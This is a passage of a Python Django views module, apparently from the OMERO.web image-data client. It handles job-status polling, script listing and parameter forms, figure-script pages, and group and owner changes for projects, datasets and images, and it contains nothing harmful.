                                dreport=_formatReport(handle),
                            )
                            in_progress += 1
                        else:  # Response available
                            close_handle = True
                            new_results.append(cbString)
                            rsp = cb.getResponse()
                            err = isinstance(rsp, omero.cmd.ERR)
                            if err:
                                update_callback(
                                    request,
                                    cbString,
                                    error=1,
                                    status="failed",
                                    dreport=_formatReport(handle),
                                )
                                failure += 1
                            else:
                                update_callback(
                                    request,
                                    cbString,
                                    error=0,
                                    status="finished",
                                    dreport=_formatReport(handle),
                                )
                    finally:
                        cb.close(close_handle)
                except Ice.ObjectNotExistException:
                    # handle already gone - assume the delete completed
                    update_callback(
                        request, cbString, error=0, status="finished", dreport=None
                    )
                except Exception as x:
                    logger.error(traceback.format_exc())
                    logger.error("Status job '%s'error:" % cbString)
                    update_callback(
                        request, cbString, error=1, status="failed", dreport=str(x)
                    )
                    failure += 1
        # update scripts
        elif job_type == "script":
            # if error on runScript, the cbString is not a ProcessCallback...
            if not cbString.startswith("ProcessCallback"):
                continue  # ignore
            if status not in ("failed", "finished"):
                logger.info("Check callback on script: %s" % cbString)
                try:
                    proc = omero.grid.ScriptProcessPrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                except IceException:
                    update_callback(
                        request,
                        cbString,
                        status="failed",
                        Message="No process found for job",
                        error=1,
                    )
                    continue
                cb = omero.scripts.ProcessCallbackI(conn.c, proc)
                # check if we get something back from the handle...
                if cb.block(0):  # ms.
                    cb.close()
                    try:
                        # we can only retrieve this ONCE - must save results
                        results = proc.getResults(0, conn.SERVICE_OPTS)
                        update_callback(request, cbString, status="finished")
                        new_results.append(cbString)
                    except Exception:
                        update_callback(
                            request,
                            cbString,
                            status="finished",
                            Message="Failed to get results",
                        )
                        logger.info("Failed on proc.getResults() for OMERO.script")
                        continue
                    # value could be rstring, rlong, robject
                    rMap = {}
                    for key, value in results.items():
                        v = value.getValue()
                        if key in ("stdout", "stderr", "Message"):
                            if key in ("stderr", "stdout"):
                                # just save the id of original file
                                v = v.id.val
                            update_kwargs = {key: v}
                            update_callback(request, cbString, **update_kwargs)
                        else:
                            if hasattr(v, "id"):
                                # do we have an object (ImageI,
                                # FileAnnotationI etc)
                                obj_data = {
                                    "id": v.id.val,
                                    "type": v.__class__.__name__[:-1],
                                }
                                obj_data["browse_url"] = getObjectUrl(conn, v)
                                if v.isLoaded() and hasattr(v, "file"):
                                    # try:
                                    mimetypes = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if v.file.mimetype.val in mimetypes:
                                        obj_data["fileType"] = mimetypes[
                                            v.file.mimetype.val
                                        ]
                                        obj_data["fileId"] = v.file.id.val
                                    obj_data["name"] = v.file.name.val
                                    # except Exception:
                                    #     pass
                                if v.isLoaded() and hasattr(v, "name"):
                                    # E.g Image, OriginalFile etc
                                    name = unwrap(v.name)
                                    if name is not None:
                                        # E.g. FileAnnotation has null name
                                        obj_data["name"] = name
                                rMap[key] = obj_data
                            else:
                                rMap[key] = unwrap(v)
                    update_callback(request, cbString, results=rMap)
                else:
                    in_progress += 1
    # having updated the request.session, we can now prepare the data for http
    # response
    rv = {}
    for cbString in request.session.get("callback").keys():
        # make a copy of the map in session, so that we can replace non
        # json-compatible objects, without modifying session
        rv[cbString] = copy.copy(request.session["callback"][cbString])
    # return json (used for testing)
    if "template" in kwargs and kwargs["template"] == "json":
        for cbString in request.session.get("callback").keys():
            rv[cbString]["start_time"] = str(
                request.session["callback"][cbString]["start_time"]
            )
        rv["inprogress"] = in_progress
        rv["failure"] = failure
        rv["jobs"] = len(request.session["callback"])
        return JsonResponse(rv)  # json
    jobs = []
    new_errors = False
    for key, data in rv.items():
        # E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
        # create id we can use as html id,
        # E.g. 39f77932-c447-40d8-8f99-910b5a531a25
        if len(key.split(" ")) > 0:
            htmlId = key.split(" ")[0]
            if len(htmlId.split("/")) > 1:
                htmlId = htmlId.split("/")[1]
        rv[key]["id"] = htmlId
        rv[key]["key"] = key
        if key in new_results:
            rv[key]["new"] = True
        if "error" in data and data["error"] > 0:
            new_errors = True
        jobs.append(rv[key])
    jobs.sort(key=lambda x: x["start_time"], reverse=True)
    context = {
        "sizeOfJobs": len(request.session["callback"]),
        "jobs": jobs,
        "inprogress": in_progress,
        "new_results": len(new_results),
        "new_errors": new_errors,
        "failure": failure,
    }
    context["template"] = "webclient/activities/activitiesContent.html"
    return context
@login_required()
def activities_update(request, action, **kwargs):
    """
    When 'action' == 'clean', remove jobs from request.session['callback']:
    a single job (when 'jobKey' is supplied in the POST data) or every job
    that is no longer in progress.
    """
    request.session.modified = True
    if action == "clean":
        if "jobKey" in request.POST:
            key = request.POST.get("jobKey")
            removed = key in request.session["callback"]
            if removed:
                del request.session["callback"][key]
                request.session.modified = True
            return JsonResponse({"removed": removed})
        # No specific job requested - drop every job that has completed
        for key, data in list(request.session["callback"].items()):
            if data["status"] != "in progress":
                del request.session["callback"][key]
    return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
    """Serve the experimenter's photo as a JPEG response."""
    photo = conn.getExperimenterPhoto(oid)
    return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extension
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
    """Delegates to webgateway's full_viewer, using the share connection
    when a share_id is given.

    Builds the 'viewport_server' prefix used by the viewer: the webindex
    URL, with the share id appended when viewing via a share.
    """
    # Replace the fragile ``cond and a or b`` idiom: it silently yields ``b``
    # whenever ``a`` is falsy.  An explicit conditional has no such trap.
    if share_id is not None:
        viewport_server = reverse("webindex") + share_id
    else:
        viewport_server = reverse("webindex")
    # remove any trailing slash
    kwargs["viewport_server"] = viewport_server.rstrip("/")
    return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
    """
    List the available scripts - Just official scripts for now
    If all scripts are under a single top-level directory, this is
    removed by default. To prevent this, use ?full_path=true
    """
    scriptService = conn.getScriptService()
    scripts = scriptService.getScripts()
    # group scripts into 'folders' (path), named by parent folder name
    scriptMenu = {}
    # comma-separated list of full paths to hide, from server settings
    scripts_to_ignore = (
        request.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in scripts:
        scriptId = s.id.val
        path = s.path.val
        name = s.name.val
        fullpath = os.path.join(path, name)
        if fullpath in scripts_to_ignore:
            logger.info("Ignoring script %r" % fullpath)
            continue
        # We want to build a hierarchical <ul> <li> structure
        # Each <ul> is a {}, each <li> is either a script 'name': <id> or
        # directory 'name': {ul}
        ul = scriptMenu
        dirs = fullpath.split(os.path.sep)
        for li, d in enumerate(dirs):
            if len(d) == 0:
                continue
            if d not in ul:
                # if last component in path:
                if li + 1 == len(dirs):
                    ul[d] = scriptId
                else:
                    ul[d] = {}
            # descend into the (possibly just-created) sub-directory
            ul = ul[d]
    # convert <ul> maps into lists and sort
    def ul_to_list(ul):
        # recursively turn the nested dicts into sorted lists of entries
        dir_list = []
        for name, value in ul.items():
            if isinstance(value, dict):
                # value is a directory
                dir_list.append({"name": name, "ul": ul_to_list(value)})
            else:
                dir_list.append({"name": name, "id": value})
        dir_list.sort(key=lambda x: x["name"].lower())
        return dir_list
    scriptList = ul_to_list(scriptMenu)
    # If we have a single top-level directory, we can skip it
    if not request.GET.get("full_path") and len(scriptList) == 1:
        scriptList = scriptList[0]["ul"]
    return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
    """
    Generates an html form for the parameters of a defined script.
    """
    scriptService = conn.getScriptService()
    try:
        params = scriptService.getParams(long(scriptId))
    except Exception as ex:
        # NOTE(review): ``ex.message`` is a Python 2 idiom; on Python 3
        # exceptions have no ``message`` attribute - confirm which runtime
        # (or compatibility shim) this file targets.
        if ex.message.lower().startswith("no processor available"):
            return {
                "template": "webclient/scripts/no_processor.html",
                "scriptId": scriptId,
            }
        raise ex
    if params is None:
        return HttpResponse()
    paramData = {}
    paramData["id"] = long(scriptId)
    paramData["name"] = params.name.replace("_", " ")
    paramData["description"] = params.description
    paramData["authors"] = ", ".join([a for a in params.authors])
    paramData["contact"] = params.contact
    paramData["version"] = params.version
    paramData["institutions"] = ", ".join([i for i in params.institutions])
    inputs = []  # use a list so we can sort by 'grouping'
    Data_TypeParam = None
    IDsParam = None
    for key, param in params.inputs.items():
        # build one form-field descriptor per script input
        i = {}
        i["name"] = key.replace("_", " ")
        i["key"] = key
        if not param.optional:
            i["required"] = True
        i["description"] = param.description
        if param.min:
            i["min"] = str(param.min.getValue())
        if param.max:
            i["max"] = str(param.max.getValue())
        if param.values:
            i["options"] = [v.getValue() for v in param.values.getValue()]
        if param.useDefault:
            i["default"] = unwrap(param.prototype)
            if isinstance(i["default"], omero.model.IObject):
                i["default"] = None
        pt = unwrap(param.prototype)
        if pt.__class__.__name__ == "dict":
            i["map"] = True
        elif pt.__class__.__name__ == "list":
            i["list"] = True
            if "default" in i:
                i["default"] = ",".join([str(d) for d in i["default"]])
        elif isinstance(pt, bool):
            i["boolean"] = True
        elif isinstance(pt, int) or isinstance(pt, long):
            # will stop the user entering anything other than numbers.
            i["number"] = "number"
        elif isinstance(pt, float):
            i["number"] = "float"
        # if we got a value for this key in the page request, use this as
        # default
        if request.GET.get(key, None) is not None:
            i["default"] = request.GET.get(key, None)
        # E.g "" (string) or [0] (int list) or 0.0 (float)
        i["prototype"] = unwrap(param.prototype)
        i["grouping"] = param.grouping
        inputs.append(i)
        if key == "IDs":
            IDsParam = i  # remember these...
        if key == "Data_Type":
            Data_TypeParam = i
    inputs.sort(key=lambda i: i["grouping"])
    # if we have Data_Type param - use the request parameters to populate IDs
    if (
        Data_TypeParam is not None
        and IDsParam is not None
        and "options" in Data_TypeParam
    ):
        IDsParam["default"] = ""
        for dtype in Data_TypeParam["options"]:
            if request.GET.get(dtype, None) is not None:
                Data_TypeParam["default"] = dtype
                IDsParam["default"] = request.GET.get(dtype, "")
                break  # only use the first match
        # if we've not found a match, check whether we have "Well" selected
        if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
            if "Image" in Data_TypeParam["options"]:
                # resolve the selected Wells to their images at 'Index'
                wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
                wellIdx = 0
                try:
                    wellIdx = int(request.GET.get("Index", 0))
                except Exception:
                    pass
                wells = conn.getObjects("Well", wellIds)
                imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
                Data_TypeParam["default"] = "Image"
                IDsParam["default"] = ",".join(imgIds)
    # try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
    # level now (not recursive!)
    for i in range(len(inputs)):
        if len(inputs) <= i:
            # we may remove items from inputs as we go - need to check
            break
        param = inputs[i]
        grouping = param["grouping"]  # E.g 03
        param["children"] = list()
        while len(inputs) > i + 1:
            nextGrp = inputs[i + 1]["grouping"]  # E.g. 03.1
            if nextGrp.split(".")[0] == grouping:
                param["children"].append(inputs[i + 1])
                inputs.pop(i + 1)
            else:
                break
    paramData["inputs"] = inputs
    return {
        "template": "webclient/scripts/script_ui.html",
        "paramData": paramData,
        "scriptId": scriptId,
    }
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
    """
    Show a UI for running figure scripts
    """
    imageIds = request.GET.get("Image", None)  # comma - delimited list
    datasetIds = request.GET.get("Dataset", None)
    wellIds = request.GET.get("Well", None)
    if wellIds is not None:
        # resolve Wells to their images at the requested field Index
        wellIds = [long(i) for i in wellIds.split(",")]
        wells = conn.getObjects("Well", wellIds)
        wellIdx = getIntOrDefault(request, "Index", 0)
        imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
        imageIds = ",".join(imageIds)
    if imageIds is None and datasetIds is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )
    def validateIds(dtype, ids):
        # keep only the ids the user can actually load; 404 when none remain
        ints = [int(oid) for oid in ids.split(",")]
        validObjs = {}
        for obj in conn.getObjects(dtype, ints):
            validObjs[obj.id] = obj
        filteredIds = [iid for iid in ints if iid in validObjs.keys()]
        if len(filteredIds) == 0:
            raise Http404("No %ss found with IDs %s" % (dtype, ids))
        else:
            # Now we can specify group context - All should be same group
            gid = list(validObjs.values())[0].getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(gid)
        return filteredIds, validObjs
    context = {}
    if imageIds is not None:
        imageIds, validImages = validateIds("Image", imageIds)
        context["idString"] = ",".join([str(i) for i in imageIds])
        context["dtype"] = "Image"
    if datasetIds is not None:
        datasetIds, validDatasets = validateIds("Dataset", datasetIds)
        context["idString"] = ",".join([str(i) for i in datasetIds])
        context["dtype"] = "Dataset"
    if scriptName == "SplitView":
        scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
        template = "webclient/scripts/split_view_figure.html"
        # Lookup Tags & Datasets (for row labels)
        imgDict = []  # A list of data about each image.
        for iId in imageIds:
            data = {"id": iId}
            img = validImages[iId]
            data["name"] = img.getName()
            tags = [
                ann.getTextValue()
                for ann in img.listAnnotations()
                if ann._obj.__class__ == omero.model.TagAnnotationI
            ]
            data["tags"] = tags
            data["datasets"] = [d.getName() for d in img.listParents()]
            imgDict.append(data)
        # Use the first image as a reference
        image = validImages[imageIds[0]]
        context["imgDict"] = imgDict
        context["image"] = image
        context["channels"] = image.getChannels()
    elif scriptName == "Thumbnail":
        scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
        template = "webclient/scripts/thumbnail_figure.html"
        def loadImageTags(imageIds):
            # collect tag annotations per image in a single query
            tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
            linkMap = {}  # group tags. {imageId: [tags]}
            tagMap = {}
            for iId in imageIds:
                linkMap[iId] = []
            for link in tagLinks:
                c = link.getChild()
                if c._obj.__class__ == omero.model.TagAnnotationI:
                    tagMap[c.id] = c
                    linkMap[link.getParent().id].append(c)
            imageTags = []
            for iId in imageIds:
                imageTags.append({"id": iId, "tags": linkMap[iId]})
            tags = []
            for tId, t in tagMap.items():
                tags.append(t)
            return imageTags, tags
        thumbSets = []  # multiple collections of images
        tags = []
        figureName = "Thumbnail_Figure"
        if datasetIds is not None:
            # one thumbnail set per dataset
            for d in conn.getObjects("Dataset", datasetIds):
                imgIds = [i.id for i in d.listChildren()]
                imageTags, ts = loadImageTags(imgIds)
                thumbSets.append({"name": d.getName(), "imageTags": imageTags})
                tags.extend(ts)
            figureName = thumbSets[0]["name"]
        else:
            imageTags, ts = loadImageTags(imageIds)
            thumbSets.append({"name": "images", "imageTags": imageTags})
            tags.extend(ts)
            parent = conn.getObject("Image", imageIds[0]).getParent()
            figureName = parent.getName() or "Thumbnail Figure"
            context["parent_id"] = parent.getId()
        uniqueTagIds = set()  # remove duplicates
        uniqueTags = []
        for t in tags:
            if t.id not in uniqueTagIds:
                uniqueTags.append(t)
                uniqueTagIds.add(t.id)
        uniqueTags.sort(key=lambda x: x.getTextValue().lower())
        context["thumbSets"] = thumbSets
        context["tags"] = uniqueTags
        context["figureName"] = figureName.replace(" ", "_")
    elif scriptName == "MakeMovie":
        scriptPath = "/omero/export_scripts/Make_Movie.py"
        template = "webclient/scripts/make_movie.html"
        # expect to run on a single image at a time
        image = conn.getObject("Image", imageIds[0])
        # remove extension (if 3 chars or less)
        movieName = image.getName().rsplit(".", 1)
        if len(movieName) > 1 and len(movieName[1]) > 3:
            movieName = ".".join(movieName)
        else:
            movieName = movieName[0]
        # make sure name is not a path
        context["movieName"] = os.path.basename(movieName)
        chs = []
        for c in image.getChannels():
            chs.append(
                {
                    "active": c.isActive(),
                    "color": c.getColor().getHtml(),
                    "label": c.getLabel(),
                }
            )
        context["channels"] = chs
        context["sizeT"] = image.getSizeT()
        context["sizeZ"] = image.getSizeZ()
    scriptService = conn.getScriptService()
    scriptId = scriptService.getScriptID(scriptPath)
    if scriptId < 0:
        raise AttributeError("No script found for path '%s'" % scriptPath)
    context["template"] = template
    context["scriptId"] = scriptId
    return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
    """
    Check whether Images / Datasets etc. contain partial multi-image
    filesets; used by the chgrp and delete dialogs to test whether the
    requested 'action' can go ahead.
    """
    # Collect the requested ids per object type from the query string
    requested = {}
    for dtype in ("Image", "Dataset", "Project"):
        id_csv = request.GET.get(dtype, None)
        if id_csv is not None:
            requested[dtype] = [int(i) for i in id_csv.split(",")]
    split_filesets = conn.getContainerService().getImagesBySplitFilesets(
        requested, None, conn.SERVICE_OPTS
    )
    # splitIds[True]: images included in the action;
    # splitIds[False]: sibling images that would be left behind
    splits = [
        {
            "id": fsId,
            "attempted_iids": splitIds[True],
            "blocking_iids": splitIds[False],
        }
        for fsId, splitIds in split_filesets.items()
    ]
    return {
        "split_filesets": splits,
        "action": "move" if action == "chgrp" else action,
        "template": "webclient/activities/fileset_check_dialog_content.html",
    }
def getAllObjects(
    conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
    """
    Given a list of containers and images, calculate all the descendants
    and necessary siblings (for any filesets)
    """
    # NOTE(review): experimenter_id is not referenced anywhere in this body.
    # TODO Handle None inputs, maybe add defaults
    params = omero.sys.ParametersI()
    qs = conn.getQueryService()
    project_ids = set(project_ids)
    dataset_ids = set(dataset_ids)
    image_ids = set(image_ids)
    fileset_ids = set([])
    plate_ids = set(plate_ids)
    screen_ids = set(screen_ids)
    # Get any datasets for projects
    if project_ids:
        params.map = {}
        params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
        q = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            dataset_ids.add(e[0].val)
    # Get any plates for screens
    if screen_ids:
        params.map = {}
        params.map["sids"] = rlist([rlong(x) for x in screen_ids])
        q = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            plate_ids.add(e[0].val)
    # Get any images for datasets
    if dataset_ids:
        params.map = {}
        params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
        q = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
            # Some images in Dataset may not have fileset
            if e[1] is not None:
                fileset_ids.add(e[1].val)
    # Get any images for plates
    # TODO Seemed no need to add the filesets for plates as it isn't possible
    # to link it from outside of its plate. This may be true for the client,
    # but it certainly isn't true for the model so maybe allow this to also get
    # filesets
    if plate_ids:
        params.map = {}
        params.map["plids"] = rlist([rlong(x) for x in plate_ids])
        q = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any extra images due to filesets
    if fileset_ids:
        params.map = {}
        params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
        q = """
            select image.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.fileset.id in (select fs.id
                                       from Image im
                                       join im.fileset fs
                                       where fs.id in (:fsids)
                                       group by fs.id
                                       having count(im.id)>1)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any additional datasets that may need updating as their children have
    # been snatched.
    # TODO Need to differentiate which orphaned directories need refreshing
    extra_dataset_ids = set([])
    extra_orphaned = False
    if image_ids:
        params.map = {
            "iids": rlist([rlong(x) for x in image_ids]),
        }
        exclude_datasets = ""
        if dataset_ids:
            params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
            # Make sure to allow parentless results as well as those
            # that do not match a dataset being removed
            exclude_datasets = """
                               and (
                                   dilink.parent.id not in (:dids)
                                   or dilink.parent.id = null
                               )
                               """
        q = (
            """
            select distinct dilink.parent.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                 from DatasetImageLink dilink2
                 where dilink2.parent.id = dilink.parent.id
                 and dilink2.child.id not in (:iids)) = 0
            """
            % exclude_datasets
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            if e:
                extra_dataset_ids.add(e[0].val)
            else:
                extra_orphaned = True
    # Get any additional projects that may need updating as their children have
    # been snatched. There is no need to check for orphans because if a dataset
    # is being removed from somewhere else, it can not exist as an orphan.
    extra_project_ids = set([])
    if dataset_ids:
        params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
        exclude_projects = ""
        if project_ids:
            params.map["pids"] = rlist([rlong(x) for x in project_ids])
            exclude_projects = "and pdlink.parent.id not in (:pids)"
        q = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                 from ProjectDatasetLink pdlink2
                 where pdlink2.parent.id = pdlink.parent.id
                 and pdlink2.child.id not in (:dids)) = 0
            """
            % exclude_projects
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            extra_project_ids.add(e[0].val)
    # We now have the complete list of objects that will change group
    # We also have an additional list of datasets/projects that may have had
    # snatched children and thus may need updating in the client if the
    # dataset/project has gone from N to 0 children
    result = {
        # These objects are completely removed
        "remove": {
            "project": list(project_ids),
            "dataset": list(dataset_ids),
            "screen": list(screen_ids),
            "plate": list(plate_ids),
            "image": list(image_ids),
        },
        # These objects now have no children
        "childless": {
            "project": list(extra_project_ids),
            "dataset": list(extra_dataset_ids),
            "orphaned": extra_orphaned,
        },
    }
    return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
    """Submit a chgrp dry-run; thin wrapper that delegates to dryRun()."""
    return dryRun(request, "chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
    """
    Submit a chgrp or chown dry-run and return its job ID.

    Target objects are read from comma-separated ID lists in the POST data,
    keyed by type name (Project/Dataset/Image/Screen/Plate/Fileset).

    @param action:  "chgrp" (reads 'group_id' from POST) or
                    "chown" (reads 'owner_id' from POST)
    @return:        HttpResponse whose body is the dry-run handle string
    """
    targetObjects = {}
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
    for dtype in dtypes:
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            targetObjects[dtype] = obj_ids
    if action == "chgrp":
        target_id = getIntOrDefault(request, "group_id", None)
    elif action == "chown":
        target_id = getIntOrDefault(request, "owner_id", None)
    else:
        # Previously an unexpected action left target_id unbound and the
        # view died with a NameError (HTTP 500); fail cleanly instead.
        return JsonResponse({"Error": "Unsupported action: %s" % action}, status=400)
    handle = conn.submitDryRun(action, targetObjects, target_id)
    jobId = str(handle)
    return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
    """
    Moves data to a new group, using the chgrp queue.
    Handles submission of chgrp form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters:
      group_id              target group (required)
      Project/Dataset/Image/Screen/Plate   comma-separated IDs to move
      new_container_name / new_container_type  optionally create a target
                            container in the destination group
      target_id             existing target, E.g. "dataset-234"
      fileset               IDs of filesets whose images must move together
    Returns JSON {'update': ...} describing objects the client should refresh.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    # Get the target group_id
    group_id = getIntOrDefault(request, "group_id", None)
    if group_id is None:
        return JsonResponse({"Error": "chgrp: No group_id specified"})
    group_id = long(group_id)
    def getObjectOwnerId(r):
        # Owner of the first Dataset/Image/Plate listed in the POST data;
        # the move runs in that user's context so links are created as them.
        for t in ["Dataset", "Image", "Plate"]:
            ids = r.POST.get(t, None)
            if ids is not None:
                for o in list(conn.getObjects(t, ids.split(","))):
                    return o.getDetails().owner.id.val
    group = conn.getObject("ExperimenterGroup", group_id)
    new_container_name = request.POST.get("new_container_name", None)
    new_container_type = request.POST.get("new_container_type", None)
    container_id = None
    # Context must be set to owner of data, E.g. to create links.
    ownerId = getObjectOwnerId(request)
    conn.SERVICE_OPTS.setOmeroUser(ownerId)
    # Optionally create a brand-new target container in the destination group
    if (
        new_container_name is not None
        and len(new_container_name) > 0
        and new_container_type is not None
    ):
        conn.SERVICE_OPTS.setOmeroGroup(group_id)
        container_id = conn.createContainer(new_container_type, new_container_name)
    # No new container, check if target is specified
    if container_id is None:
        # E.g. "dataset-234"
        target_id = request.POST.get("target_id", None)
        container_id = target_id is not None and target_id.split("-")[1] or None
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            # TODO Doesn't the filesets only apply to images?
            # if 'filesets' are specified, make sure we move ALL Fileset Images
            fsIds = request.POST.getlist("fileset")
            if len(fsIds) > 0:
                # If a dataset is being moved and there is a split fileset
                # then those images need to go somewhere in the new
                if dtype == "Dataset":
                    conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
                else:
                    for fs in conn.getObjects("Fileset", fsIds):
                        obj_ids.extend([i.id for i in fs.copyImages()])
                obj_ids = list(set(obj_ids))  # remove duplicates
            logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
            handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
            jobId = str(handle)
            # Record the job in the session so it appears in 'Activities'
            request.session["callback"][jobId] = {
                "job_type": "chgrp",
                "group": group.getName(),
                "to_group_id": group_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True
    # Update contains a list of images/containers that need to be
    # updated.
    project_ids = request.POST.get("Project", [])
    dataset_ids = request.POST.get("Dataset", [])
    image_ids = request.POST.get("Image", [])
    screen_ids = request.POST.get("Screen", [])
    plate_ids = request.POST.get("Plate", [])
    if project_ids:
        project_ids = [long(x) for x in project_ids.split(",")]
    if dataset_ids:
        dataset_ids = [long(x) for x in dataset_ids.split(",")]
    if image_ids:
        image_ids = [long(x) for x in image_ids.split(",")]
    if screen_ids:
        screen_ids = [long(x) for x in screen_ids.split(",")]
    if plate_ids:
        plate_ids = [long(x) for x in plate_ids.split(",")]
    # TODO Change this user_id to be an experimenter_id in the request as it
    # is possible that a user is chgrping data from another user so it is
    # that users orphaned that will need updating. Or maybe all orphaned
    # directories could potentially need updating?
    # Create a list of objects that have been changed by this operation. This
    # can be used by the client to visually update.
    update = getAllObjects(
        conn,
        project_ids,
        dataset_ids,
        image_ids,
        screen_ids,
        plate_ids,
        request.session.get("user_id"),
    )
    # return HttpResponse("OK")
    return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
    """
    Moves data to a new owner, using the chown queue.
    Handles submission of chown form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters: 'owner_id' (required) plus comma-separated ID lists
    keyed by type name (Project/Dataset/Image/Screen/Plate).
    Returns JSON {'jobIds': [...]} with one job per object type submitted.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    # Get the target owner_id
    owner_id = getIntOrDefault(request, "owner_id", None)
    if owner_id is None:
        return JsonResponse({"Error": "chown: No owner_id specified"})
    owner_id = int(owner_id)
    exp = conn.getObject("Experimenter", owner_id)
    if exp is None:
        # NB: the previous message had no %s placeholder, so applying "%"
        # raised a TypeError instead of returning this error response.
        return JsonResponse({"Error": "chown: Experimenter %s not found" % owner_id})
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    jobIds = []
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
            handle = conn.chownObjects(dtype, obj_ids, owner_id)
            jobId = str(handle)
            jobIds.append(jobId)
            # Record the job in the session so it appears in 'Activities'
            request.session["callback"][jobId] = {
                "job_type": "chown",
                "owner": exp.getFullName(),
                "to_owner_id": owner_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
    request.session.modified = True
    return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
    """
    Runs a script using values in a POST

    Looks up the script's declared parameters, converts each POST value to
    the rtype of the matching parameter prototype, then delegates execution
    to run_script() and returns its result as JSON.
    """
    scriptService = conn.getScriptService()
    inputMap = {}
    sId = long(scriptId)
    try:
        params = scriptService.getParams(sId)
    except Exception as x:
        # NOTE(review): Python 3 exceptions have no .message attribute, so
        # this access would raise AttributeError there -- confirm whether
        # this path is Python-2 only or needs the hasattr guard used in
        # run_script().
        if x.message and x.message.startswith("No processor available"):
            # Delegate to run_script() for handling 'No processor available'
            rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
            return JsonResponse(rsp)
        else:
            raise
    params = scriptService.getParams(sId)
    scriptName = params.name.replace("_", " ").replace(".py", "")
    logger.debug("Script: run with request.POST: %s" % request.POST)
    # upload new file
    fileupload = (
        "file_annotation" in request.FILES and request.FILES["file_annotation"] or None
    )
    fileAnnId = None
    if fileupload is not None and fileupload != "":
        manager = BaseContainer(conn)
        fileAnnId = manager.createFileAnnotations(fileupload, [])
